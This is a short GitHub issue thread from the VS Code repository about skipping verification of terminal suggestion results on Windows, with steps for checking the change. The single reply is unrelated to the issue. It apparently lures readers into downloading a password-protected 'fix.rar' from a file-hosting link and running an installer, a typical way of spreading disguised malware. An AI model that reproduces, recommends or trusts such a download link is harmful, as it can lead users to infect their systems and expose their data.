### ISSUE TITLE
Terminal suggest: Don't verify results on Windows

### ISSUE THREAD

**Issue by Tyriar** [microsoft/vscode#226760]
This causes delays (see https://github.com/microsoft/vscode/issues/226186), but it was only needed on macOS so we shouldn't negatively impact Windows users.

Verify:

- Run ls in terminal to verify global suggestions are loaded
- After this, all suggestions should return fast (with the exception of certain git ones like `git checkout *`  which take some time to process depending on the repo)

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
